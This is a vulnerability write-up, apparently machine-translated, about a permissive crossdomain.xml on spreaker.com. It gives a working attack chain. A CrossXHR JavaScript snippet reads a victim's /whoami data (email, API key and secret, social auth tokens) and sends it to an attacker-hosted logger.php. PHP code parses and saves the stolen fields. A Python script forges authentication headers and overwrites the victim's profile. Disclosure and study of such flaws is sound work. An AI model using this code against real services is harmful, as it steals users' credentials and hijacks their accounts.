Crossdomain. xml evil usage example

Crossdomain. xml evil usage example

Introduction: This starts *
The crossdomain. xml file specifies the access domain name read/write request. This file should be restricted to a trusted website, but not on the spreaker website. Wildcard characters indicate that any site is allowed to send a request/read response to a file. The response of spreaker.com/crossdomain.xmlis as follows:
Domain = "*"/>

With this in mind, let's try to use it!

Exploitation

The impact of "Incorrect configuration" depends on the application itself! Find a page containing sensitive information in the application. For example, a web application allows users to send/receive emails (like Yahoo, gmail ..) reading his email is a sensitive action. For example, if a web application contains a personal homepage page, we can know the user name, email address, and other information even if we do nothing .....

1) Search for sensitive pages

This API: callback:

The Spreaker API's API Key and Secret allow you to easily read public information without authentication. For example, api.spreaker.com/show/9will return public information related to "The bit a bit show. If you need to obtain privacy information or create and modify data, you need to perform authentication.
For authentication, You need to obtain your API Key and Secret:

Open api.spreaker.com/whoamiand read the API key and secret (they will never change)

This is the Gospel. api.spreaker.com/whoamichain includes all the sensitive information of existing users:

Userid, fullname, fbuserid, email, ** apikey **, api secret, twauthtoken, twauthtoken_secret, fbauthtoken ,...
You can also obtain this information from www.spreaker.com/account/profile!

2) Compile PoC to search/save sensitive pages

You can send a request to api.spreaker.com/whoamiby encoding a Flash file (script language) and send the content in the page to the log. Because I am not very good at programming with flash, I use the ready-made CrossXHR.

First, we need to obtain the request for the page:

function test_get() {request = new CrossXHR();request.onreadystatechange = callback;request.open('GET', 'http://api.spreaker.com/whoami');request.send(); }

Then process the response. In this case, I send it to the log record, and then parse and save the sensitive information:
Data = request. responseText; // contain the content of the/whoami httpGet ("/poc/logger. php? Data = "+ data); // send it to logger alert (" done "); // just for demo

Logger. php: receives json data and parses and stores the data

//receive contetnt via data param , then parse it $data=$_GET['data'];    $obj = json_decode($data);$email = $obj->{'response'}->{'user'}->{'email'};$apikey =  $obj->{'response'}->{'user'}->{'api_key'}->{'key'};$apisecret =  $obj->{'response'}->{'user'}->{'api_key'}->{'secret'}; ...  $html = ''; $html.= ''; $html.= 'User Id '; $html.= 'Fullname '; $html.= 'email  '; ...  $html.= $email; $html.=''; $html.=''; $html.= $apikey; $html.=''; $html.=''; $html.= $apisecret;  ...  $file=fopen('data.html','a');   fwrite($file," \n");  fwrite($file,$html."\n\n\n");  fwrite($file," \n");  fclose($file);   ....

PoC is hungry and impatient. What we did previously was to visit the attacker site attacker.com and record user sensitive information in a very sexy html page.


Impact

Now that we have the API/secret, we can understand exactly what kind of producer s.spreaker.com has said above.

If your account also links to other social media accounts (twitter, fb, g +), we can also get the auth_token/auth secret! In particular, the phrase "the API key and secret will never change" in the development documentation is more domineering! You cannot change the API key and secret even if your account is stolen! Another sentence is just a change in password and email! Only Accounts deleted are left to users.

Next, we should generate an authentication digest and send it through the X-Spreaker-Auth HTTP header. Then we allow the user representatives to send authentication requests:

import randomimport timeimport hashlib,sys,requests,jsonuser_id = sys.argv[1]api_key    = sys.argv[2]api_secret = sys.argv[3]# Generate a nonce and get the current timestamp (from epoch)nonce      = random.randint(0, 99999999)timestamp  = int(time.time())# Generate the hashmd5        = hashlib.md5()md5.update("%s:%s:%s:%s" % (nonce, api_key, api_secret, timestamp))# Generate the digestdigest     = "%s:%s:%s:%s" % (nonce, api_key, timestamp, md5.hexdigest())print 'X-Spreaker-Auth: %s'%(digest)url = "http://api.spreaker.com/user/"+str(user_id)payload = {'description': 'Hacked'}headers = {'X-Spreaker-Auth': digest}r = requests.put(url, params=payload, headers=headers)print 'response code: ' + str(r.status_code)

Run
# Python poc. py userid api_key api_secret

Visit our new personal page: